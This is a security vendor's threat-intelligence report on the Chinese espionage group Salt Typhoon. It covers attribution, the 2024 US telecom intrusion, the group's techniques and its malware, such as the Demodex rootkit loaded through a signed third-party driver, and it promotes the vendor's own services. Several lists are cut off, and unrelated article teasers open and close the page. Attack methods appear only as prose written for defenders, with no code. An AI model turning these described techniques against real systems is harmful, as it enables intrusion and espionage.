Drawing on insights from 582 full-spectrum DFIR investigations, Mjolnir Security reveals the uncharted forensic landscape of Windows 11. This intelligence briefing moves beyond legacy artifacts to expose the critical evidence sources modern adversaries leverage, including the Windows Subsystem for Android (WSA), covert channels in Microsoft Teams, and the persistent ledger [...]
Salt Typhoon is a highly sophisticated and persistent cyber espionage group conclusively attributed to China’s Ministry of State Security (MSS).1 Operating under various aliases, including Earth Estrie and Ghost Emperor, the group executes long-term, stealth-oriented campaigns aligned with the strategic objectives of the Chinese state.2 Its primary mission is not financial gain or disruptive sabotage but sustained intelligence gathering, focusing on critical infrastructure, government entities, and technology sectors globally.2
The group’s landmark operation, the 2024 compromise of at least nine major U.S. telecommunications providers, has been described by senior U.S. officials as the “worst telecom hack in our nation’s history”.1 This intrusion demonstrated a breathtaking level of sophistication, enabling the actor to access not only vast amounts of subscriber metadata but also the content of legally authorized law enforcement wiretaps, effectively turning a U.S. intelligence tool into a foreign surveillance asset.1 The targets of this surveillance reportedly included high-level U.S. political figures, underscoring the group’s focus on espionage at the highest levels of power.1
Salt Typhoon’s methodology is characterized by a pragmatic and patient approach. The group overwhelmingly favors exploiting known, unpatched vulnerabilities in public-facing infrastructure and employs an extensive repertoire of “Living off the Land” (LotL) techniques.5 By using legitimate system tools like PowerShell and WMI, they blend seamlessly with normal administrative activity, allowing them to maintain a low-and-slow presence and evade detection for months or even years.4 This is augmented by a custom arsenal of advanced malware, including the Demodex kernel-mode rootkit and the GhostSpider backdoor, which are deployed for stealth, persistence, and data exfiltration in high-value environments.1
Countering a state-sponsored adversary of this caliber requires a fundamental shift away from reactive, signature-based security models. An effective defense must be proactive, intelligence-led, and founded on the principle of “assume breach.” Mjolnir Security delivers a suite of integrated services designed specifically to address this type of advanced, persistent threat. Our Threat Hunting as a Service (THaaS) actively seeks out the subtle behavioral indicators of LotL activity that automated tools miss. Our Digital Forensics and Incident Response (DFIR) teams possess the deep expertise required to uncover and eradicate entrenched adversaries, even those using advanced anti-forensic tools like rootkits. Finally, our Proactive Security Assessments and Virtual CISO (vCISO) services provide the strategic oversight and tactical validation necessary to harden defenses and build long-term organizational resilience against the persistent threat posed by Salt Typhoon.
There is a broad consensus within the global intelligence and cybersecurity communities that Salt Typhoon operates as an operational arm of the People’s Republic of China’s (PRC) Ministry of State Security (MSS).1 The MSS is China’s primary civilian intelligence, security, and secret police agency, responsible for both foreign intelligence and domestic counter-intelligence. The attribution of Salt Typhoon to the MSS is not based on a single piece of evidence but on a convergence of technical indicators, strategic objectives, and official government actions.
The group’s campaigns are characterized by a focus on targets that align directly with the known intelligence requirements of the Chinese state: military technology, sensitive intellectual property, political intelligence on foreign adversaries, and deep access into global critical infrastructure.2 Unlike financially motivated cybercrime syndicates, Salt Typhoon’s activities do not involve ransomware or overt extortion; their currency is information and strategic access.4 This espionage-centric mission is a hallmark of state-sponsored operations.
Official actions by the U.S. government have solidified this attribution. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have issued joint advisories confirming and detailing the group’s campaigns against U.S. infrastructure.10 Furthermore, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) has taken the significant step of sanctioning entities, such as Sichuan Juxinhe Network Technology Co., LTD., for their direct involvement with Salt Typhoon’s operations.4 These formal government actions represent a high-confidence assessment of the group’s linkage to the MSS. As is standard diplomatic practice, the Chinese government has denied all allegations, labeling them “unfounded and irresponsible smears”.1
Salt Typhoon does not operate in a vacuum. It is one of several major PRC-linked threat actors designated by Microsoft and other researchers with the “Typhoon” suffix, each appearing to have a distinct yet complementary mission set.10 Understanding Salt Typhoon’s role requires seeing it as part of a larger, coordinated national cyber strategy. The primary actors in this constellation include:
The distinct but interlocking missions of these groups—intelligence (Salt), operations (Volt), and logistics (Flax)—are not coincidental. They mirror the classical structure of a modern military or intelligence directorate. This suggests that these are not disparate, competing hacking groups but rather specialized divisions within a unified command, likely the MSS, each executing a specific part of a comprehensive national cyber strategy. An intrusion by one actor could be a precursor to, or supported by, the activities of another. Therefore, defending against the espionage of Salt Typhoon requires the strategic awareness that the same adversary may possess latent disruptive capabilities through its sibling groups.
The challenge of tracking this adversary is compounded by the variety of names used by different cybersecurity vendors. While this is common in threat intelligence, it underscores the need for careful correlation. Microsoft’s designation, Salt Typhoon, has become the most widely adopted moniker.1 Key aliases include:
This report will primarily use the name Salt Typhoon for clarity and consistency.
To effectively defend against Salt Typhoon, it is crucial to move beyond a purely technical analysis of their tools and understand the organizational culture, structure, and operational philosophy that drives their actions. Their behavior reveals a mature, professional, and highly organized entity.
Evidence strongly indicates that Salt Typhoon is not a monolithic entity but a well-organized collective with a clear division of labor.1 Trend Micro’s analysis suggests that attacks targeting different regions and industries are launched by distinct teams, and that the command-and-control (C2) infrastructure is managed by separate, specialized units.1
This compartmentalized and specialized structure provides several strategic advantages. It allows for the simultaneous execution of multiple, complex campaigns across the globe without operational interference. It builds deep subject-matter expertise within teams, enabling them to become highly effective at targeting specific sectors (like telecommunications) or technologies (like Cisco routers). Finally, this structure enhances operational security and resilience; the disruption or discovery of one team or its infrastructure is less likely to compromise the entire organization. This model is not indicative of a loose collective of hackers but of a professional, state-directed enterprise with a formal organizational chart, project management, and long-term strategic planning.
The core cultural tenet of Salt Typhoon is the prioritization of stealth and persistence above all else. Their primary objective is to establish and maintain long-term, undetected access to target networks to facilitate continuous intelligence gathering.4 This philosophy is evident in their exceptionally long dwell times, with campaigns often remaining active for one to two years, or even longer, before discovery.1
This focus on stealth manifests directly in their TTPs. They meticulously cover their tracks, employing anti-forensic techniques such as disabling or clearing system logs to frustrate investigators.8 Their preference for “Living off the Land” techniques is a direct expression of this philosophy, as using legitimate, built-in system tools allows their malicious activities to be hidden in the noise of normal network administration.11 This patient, low-and-slow approach is the behavioral signature of an espionage agency, not a smash-and-grab cybercriminal.
Salt Typhoon’s approach to tooling reflects a culture of professional pragmatism and efficiency. They are not dogmatic about using only custom-built tools. The organization invests significant resources in developing highly sophisticated, bespoke malware when the mission demands it. The Demodex kernel-mode rootkit, for example, is a complex piece of software designed to provide the highest level of stealth on modern, hardened operating systems—a tool reserved for the most critical operations.1
At the same time, the group demonstrates resourcefulness by leveraging the broader cybercrime ecosystem. They have been observed using shared backdoors like SnappyBee, which are common among Chinese APT actors, and potentially utilizing Malware-as-a-Service (MaaS) platforms.9 This approach is highly efficient. It conserves the time and expense of in-house development for more common tasks, freeing up their top-tier developers to focus on unique, high-impact tools like Demodex. This blended arsenal of bespoke, shared, and commodity tools is the hallmark of a mature, well-funded, and operationally efficient intelligence organization that makes calculated decisions based on a cost-benefit analysis of its operational needs.
Salt Typhoon’s operational history, active since at least 2019, reveals a consistent and strategic pattern of targeting that underscores its mission as a global intelligence-gathering apparatus for the Chinese state.8
While the group’s most high-profile attacks have been against the United States, its operational footprint is global, with confirmed victims on nearly every continent.1 This worldwide reach demonstrates the breadth of the PRC’s strategic interests. Analysis of their campaigns reveals a clear and consistent targeting doctrine focused on sectors that yield the highest intelligence value:
The campaign against U.S. telecommunications providers, which began as early as 2022 but was publicly disclosed in late 2024, stands as Salt Typhoon’s most audacious and impactful operation to date.1 It serves as a masterclass in the group’s capabilities and strategic intent.
The implications of this single operation are profound. By compromising the CALEA system, Salt Typhoon did more than just steal data; they subverted a critical tool of U.S. law enforcement and intelligence. They effectively transformed a U.S. government asset into their own foreign intelligence collection platform. This move reveals a third-order level of strategic thinking. The first-order effect is the hack itself. The second-order effect is access to customer data. The third-order effect, which Salt Typhoon achieved, is gaining insight into the U.S. government’s own intelligence priorities—by seeing who the U.S. is targeting for surveillance—and then piggybacking on that collection. This demonstrates an exceptionally sophisticated understanding of U.S. infrastructure and a bold strategic mandate far beyond simple data theft.
The U.S. government’s response has been correspondingly severe, with Senator Mark Warner, Chair of the Senate Intelligence Committee, calling it the “worst telecom hack in our nation’s history” and making prior Russian cyber operations look like “child’s play” in comparison.7 The aftermath has included a multi-agency investigation, a $10 million FBI bounty for information on Salt Typhoon members, Treasury Department sanctions, and a push by the FCC for new, mandatory cybersecurity regulations for the entire telecommunications industry.1
Salt Typhoon’s operational methodology is a carefully balanced blend of exploiting common weaknesses and deploying highly advanced, custom capabilities. Their tactics, techniques, and procedures (TTPs), when mapped to a framework like MITRE ATT&CK®, reveal the behavioral patterns of a patient, adaptable, and stealth-focused adversary.
Salt Typhoon’s primary entry strategy is a pragmatic exploitation of poor cyber hygiene. They consistently target publicly known, and often old, vulnerabilities in internet-facing servers, firewalls, and other network appliances.2 This approach is not born of simplicity but of strategic efficiency; it is often easier and less risky to find an unpatched system than to burn a valuable zero-day exploit. Key vulnerabilities frequently leveraged by the group include:
As a secondary method, the group also conducts targeted spear-phishing campaigns designed to trick key individuals into executing malicious payloads.2
Once inside a network, Salt Typhoon’s core behavioral trait is its extensive use of “Living off the Land” (LotL) techniques.2 This involves abusing legitimate, pre-installed system administration tools to carry out their objectives. This tactic is highly effective for defense evasion, as it allows their malicious activity to blend in with the noise of everyday IT operations, making it extremely difficult for traditional endpoint detection and response (EDR) and antivirus (AV) solutions to identify.
The group’s movement within a compromised network is methodical and designed to avoid detection. After harvesting credentials, they use them to access other systems. Key techniques include:
Salt Typhoon dedicates significant effort to evading security controls, which is critical to their long-term operational model. Their techniques are multi-layered:
This reliance on exploiting poor cyber hygiene and using LotL techniques is not a sign of technical limitation but of strategic discipline. While the group possesses the capability to develop and use zero-day exploits, their preference for the path of least resistance demonstrates a deep understanding that organizational and human failures—such as a system administrator failing to apply a patch—are often more reliable and less risky vulnerabilities to exploit than purely technical ones. This operational doctrine values stealth, patience, and efficiency, targeting process failures as much as technological flaws. A defense strategy focused solely on detecting advanced malware will inevitably fail; it must also address fundamental security posture, administrative discipline, and the detection of anomalous behavior.
Salt Typhoon’s C2 infrastructure is sophisticated and resilient. Communications are almost always encrypted and designed to blend with legitimate traffic.2 They often use compromised routers or servers as jump hosts or proxies, making it difficult to trace traffic back to its true source.8 For data exfiltration, they typically stage the data first. This involves collecting sensitive information, compressing it into archives (often using legitimate tools like
rar.exe or creating .cab files), and moving it to an inconspicuous directory, such as C:\Users\Public\Music, before transmitting it out of the network.4
While Salt Typhoon excels at “Living off the Land,” it also maintains a formidable arsenal of custom and shared malware. These tools are deployed strategically to achieve objectives that cannot be met with standard system utilities, particularly for establishing stealthy persistence, enabling remote control, and conducting specialized data collection.
Table 1: Salt Typhoon Malware & Toolset
| Malware Name | Type | Primary Function | Operational Context & Key Features | Relevant Snippets |
| Demodex | Kernel-Mode Rootkit | Stealth & Persistence | Hides files, processes, registry keys, and network traffic from security tools. Abuses a legitimate, signed third-party driver (from Cheat Engine) to bypass Windows Driver Signature Enforcement, allowing it to load on modern, secure-boot-enabled systems. | 1 |
| GhostSpider | Modular Backdoor | Espionage & C2 | Deployed via DLL hijacking and operates primarily in-memory to evade file-based detection. Its modular design allows for flexible deployment of capabilities. Communicates with its C2 server using encrypted commands hidden within HTTP headers or cookies. | 2 |
| SparrowDoor | Backdoor & Loader | Persistence & Remote Access | Often deployed via web shells on compromised servers. Provides remote access for file operations, command execution, and opening a reverse shell. Communicates over encrypted HTTP. Newer variants feature improved architecture and can process commands in parallel. | 5 |
| JumbledPath | Packet Sniffer | Network Data Collection | A specialized, Go-based utility designed to perform packet capture on compromised Cisco network devices. It uses a chain of jump hosts to route its traffic, obscuring the attacker’s true location and making the activity appear internal. | 4 |
| SnappyBee | Data Exfiltration Malware | Espionage & Data Theft | A stealthy malware used for data theft, often spread via phishing or malicious downloads. It establishes persistence, injects into legitimate processes, monitors user activity, and exfiltrates credentials and sensitive documents. It is a tool shared among several Chinese APT groups. | 9 |
| Masol RAT | Remote Access Trojan | Remote Control | A cross-platform Remote Access Trojan (RAT) that provides attackers with interactive control over a compromised machine. It has been observed targeting both Windows and Linux servers within victim networks. | 9 |
Demodex: This Windows kernel-mode rootkit is arguably Salt Typhoon’s most sophisticated tool and is reserved for high-value targets where long-term, undetected persistence is paramount.19 Its most innovative feature is its loading mechanism. To bypass modern Windows security features like Driver Signature Enforcement (which prevents unsigned drivers from being loaded into the kernel), Demodex does not attempt to use a stolen code-signing certificate. Instead, it abuses a legitimate, digitally signed third-party driver belonging to the open-source tool “Cheat Engine”.14 The attackers first install this benign driver, then exploit its functionality to manipulate kernel memory and manually load the unsigned Demodex rootkit, effectively piggybacking on the legitimate driver’s signature. Once loaded, Demodex hooks deep into the operating system to hide the group’s other malware artifacts—files, processes, and network connections—from both security software and forensic investigators.19
GhostSpider: This is a modular, in-memory backdoor designed for espionage.13 It is typically loaded into a compromised process using DLL hijacking. By operating entirely in memory, it leaves a minimal footprint on the disk, making it difficult for file-based antivirus scanners to detect. Its modularity allows the attackers to deploy only the specific functions needed for a given target, reducing the risk of discovery.18 C2 communications are cleverly disguised, with commands and data hidden within standard HTTP traffic, often inside headers or cookies, to blend in with legitimate web browsing.13
JumbledPath: This tool showcases the group’s specific focus on telecommunications infrastructure. JumbledPath is a custom utility written in the Go programming language, designed for a single purpose: to capture network packets on compromised Cisco devices.8 Its use of jump hosts—intermediary compromised systems—to relay commands and exfiltrate data is a key feature that makes its traffic appear to originate from a trusted internal source, complicating network-based detection.24
The tactics, techniques, and procedures employed by Salt Typhoon render traditional, reactive security models fundamentally inadequate. A defense strategy predicated on waiting for alerts from signature-based tools like antivirus or simple firewalls is destined to fail. The group’s heavy reliance on “Living off the Land” techniques, its use of encrypted and proxied command-and-control channels, and its deployment of advanced, in-memory malware and kernel-mode rootkits are all designed specifically to bypass these legacy defenses.5
Therefore, building resilience against a state-sponsored adversary like Salt Typhoon requires a paradigm shift in defensive philosophy. The foundational principle of this new posture must be the concept of “assume breach.” Organizations in critical sectors must operate under the assumption that a persistent and sophisticated actor is already present, or will inevitably gain access to, their networks. This mindset moves the focus from solely preventing intrusion to rapidly detecting, containing, and eradicating threats that are already inside.
This intelligence-led defense model is built on several key pillars:
Mjolnir Security provides a suite of advanced, intelligence-driven services designed to empower organizations to adopt this proactive defense posture and effectively counter the specific threats posed by Salt Typhoon. Our capabilities are directly mapped to the adversary’s TTPs, providing a comprehensive and layered defense.
Table 2: Mjolnir Services vs. Salt Typhoon TTPs
| Adversary Tactic (Salt Typhoon) | Adversary Technique (MITRE ATT&CK® ID) | Mjolnir Security Countermeasure/Service | How Mjolnir Helps | Relevant Snippets |
| Initial Access | Exploit Public-Facing Application (T1190) | Vulnerability Assessment & Mjolnir Shield Penetration Testing | Proactively identifies and validates the same unpatched vulnerabilities in systems like Cisco, Exchange, and Ivanti that Salt Typhoon exploits, allowing for remediation before they can be compromised. Our Red Team assessments simulate their attack paths. | 8 |
| Execution & Lateral Movement | Command and Scripting Interpreter (T1059), WMI (T1047), Remote Services (T1021) | Threat Hunting as a Service (THaaS) | Our expert human hunters actively search for the anomalous use of legitimate tools (PowerShell, WMI, PsExec) that signature-based products miss. We hunt for the adversary’s behavior, not just their malware, detecting the stealthy LotL activity that is a hallmark of Salt Typhoon. | 4 |
| Defense Evasion & Persistence | Rootkit (T1014), Masquerading (T1036), Indicator Removal on Host (T1070) | Digital Forensics & Incident Response (DFIR) | Our DFIR team possesses the deep technical expertise required to perform kernel-level memory forensics to uncover threats like the Demodex rootkit and reconstruct attacker activity even when logs have been cleared. We find what adversaries try to hide. | 1 |
| Credential Access | OS Credential Dumping: LSASS Memory (T1003.001) | Incident Response (IR) & Compromise Assessment | In the event of a breach, our IR team rapidly contains the threat to prevent further credential theft. Proactively, our Compromise Assessment service hunts for evidence of past or ongoing intrusions, including signs of credential dumping and lateral movement. | 5 |
| Command & Control | Encrypted Channel (T1573), Proxy (T1090) | SOCaaS with Advanced Threat Detection | Our 24/7 Security Operations Center as a Service (SOCaaS) leverages advanced tooling and expert analysis to monitor network traffic for sophisticated C2 patterns, including encrypted channels, beaconing to unusual domains, and the use of internal proxies, which are key TTPs for Salt Typhoon. | 2 |
| Overall Strategy & Resilience | N/A | Virtual CISO (vCISO) & Security Assessments (Gap, Cloud) | Our vCISO service provides the strategic leadership to build a robust, long-term defense posture. We help implement Zero Trust principles, mature vulnerability management programs, and address the systemic weaknesses in process and policy that enable actors like Salt Typhoon to succeed. | 6 |
Mjolnir Security’s Threat Hunting as a Service (THaaS) is a critical capability for detecting an adversary like Salt Typhoon.36 Recognizing that you are not fighting technology, but humans behind the technology, our service deploys expert human hunters who understand the adversary’s mindset and methodologies.42 Unlike automated tools that rely on known-bad signatures, our hunters proactively search for indicators of attack—the subtle patterns of malicious behavior masquerading as legitimate administrative activity.37 By developing hypotheses based on MITRE ATT&CK® and intelligence on Salt Typhoon’s specific TTPs, our hunters search endpoint, network, and log data for evidence of LotL techniques, anomalous credential usage, and stealthy persistence mechanisms that would otherwise go unnoticed.44
In the event of a breach by a sophisticated actor like Salt Typhoon, a swift and expert response is paramount to minimizing damage. Mjolnir Security’s DFIR services are designed to manage the full lifecycle of an incident, from containment to recovery.40 Our team of certified forensic professionals utilizes state-of-the-art tools and methodologies to conduct deep investigations, capable of uncovering kernel-level rootkits like Demodex and reconstructing attack timelines even in the face of anti-forensic techniques like log wiping.41 Our process ensures the complete eradication of the threat actor’s presence, including all backdoors and persistence mechanisms, followed by a strategic recovery phase to harden systems and prevent re-infection.39 Our 24/7 Incident Response hotline at +1 833 403 5875 ensures immediate access to our elite cyber SWAT unit in a crisis.39
The most effective way to combat Salt Typhoon is to deny them their preferred entry vectors. Mjolnir Security’s portfolio of proactive services is designed to do precisely that. Our Vulnerability Assessments and Mjolnir Shield Penetration Testing services identify and validate the very security gaps in external-facing systems that Salt Typhoon exploits, providing actionable guidance for remediation before an attack occurs.36 Our
Compromise Assessments proactively hunt for signs of an existing, undiscovered breach. For organizations needing strategic guidance, our Virtual CISO (vCISO) service provides the executive-level expertise to build and mature a comprehensive security program. Our vCISOs work with leadership to implement robust vulnerability management processes, drive the adoption of Zero Trust principles, and instill the organizational discipline required to build lasting resilience against persistent, state-sponsored threats.
Salt Typhoon is not a transient problem or a common cybercriminal group. It is the manifestation of a nation-state’s strategic will, executed by a professional, well-resourced, and highly disciplined organization. Their focus on long-term espionage, their patient and stealthy methodology, and their demonstrated ability to compromise the core infrastructure of a global superpower represent a persistent and escalating threat. They are a permanent feature of the modern cyber landscape.
Defending against such an adversary cannot be accomplished through technology alone. It requires a fundamental shift in mindset from a reactive posture of perimeter defense to a proactive, intelligence-driven strategy of resilience. It demands an understanding of the adversary’s “anthropology”—their culture, their motivations, and their operational doctrines—to anticipate their movements and counter their techniques. The path to resilience is built on the assumption of a compromised environment, the active hunting of threats within the wire, and an unwavering commitment to the fundamentals of security hygiene.
This is a battle of persistence, intelligence, and expertise. Mjolnir Security provides the critical combination of advanced technology, elite human talent, and strategic insight necessary to level the playing field. By partnering with Mjolnir, organizations can move beyond a state of constant reaction and begin to build a truly resilient security posture capable of withstanding the sustained pressure from one of the world’s most formidable cyber espionage actors.
A deep-dive analysis reveals that Iranian state-sponsored cyber threats to U.S. and Canadian critical infrastructure are not random, but a core component of a sophisticated geopolitical strategy. Rooted in a ...
